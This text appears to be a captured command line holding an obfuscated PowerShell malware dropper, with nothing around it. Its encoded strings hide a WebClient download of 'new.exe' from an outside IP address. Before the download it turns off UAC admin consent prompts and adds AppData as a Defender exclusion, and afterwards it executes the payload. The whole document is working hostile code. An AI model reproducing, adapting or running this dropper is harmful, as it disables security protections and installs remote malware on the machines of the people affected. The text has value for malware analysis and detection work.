powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function wPteUlwSl($qhjsuSd, $vgEFwpxboUPauFSM){[IO.File]::WriteAllBytes($qhjsuSd, $vgEFwpxboUPauFSM)};function ZnrSgmqbPVfjB($qhjsuSd){if($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33641,33649,33649))) -eq $True){rundll32.exe $qhjsuSd }elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33653,33656,33590))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $qhjsuSd}elseif($qhjsuSd.EndsWith((dKWlQUWuijH @(33587,33650,33656,33646))) -eq $True){misexec /qn /i $qhjsuSd}else{Start-Process $qhjsuSd}};function RRqzVWXfYUJFDAwJpdp($bJOaLKsoekvRrDkAPwq){$FtxzLgTFTlTLhRsI = New-Object (dKWlQUWuijH @(33619,33642,33657,33587,33628,33642,33639,33608,33649,33646,33642,33651,33657));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$vgEFwpxboUPauFSM = $FtxzLgTFTlTLhRsI.DownloadData($bJOaLKsoekvRrDkAPwq);return $vgEFwpxboUPauFSM};function dKWlQUWuijH($xDrfpdisvcDSC){$SzhMyYwdKDtrEZC=33541;$LZOAyvnxYRB=$Null;foreach($bKFEidACAllzisv in $xDrfpdisvcDSC){$LZOAyvnxYRB+=[char]($bKFEidACAllzisv-$SzhMyYwdKDtrEZC)};return $LZOAyvnxYRB};function enAxnkDfhW(){$OCTHfCJvxwmY = $env:AppData + '\';Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;$xsXesBDGtNXaQjqb=$env:AppData; Add-MpPreference -ExclusionPath $xsXesBDGtNXaQjqb;$obJQIBqPB = $OCTHfCJvxwmY + 'new.exe'; if (Test-Path -Path $obJQIBqPB){ZnrSgmqbPVfjB $obJQIBqPB;}Else{ $bPZFpQO = RRqzVWXfYUJFDAwJpdp (dKWlQUWuijH @(33645,33657,33657,33653,33599,33588,33588,33591,33590,33589,33587,33594,33595,33587,33590,33592,33587,33590,33590,33593,33588,33651,33642,33660,33587,33642,33661,33642));wPteUlwSl $obJQIBqPB $bPZFpQO;ZnrSgmqbPVfjB $obJQIBqPB;};;;;}enAxnkDfhW;" uac
2060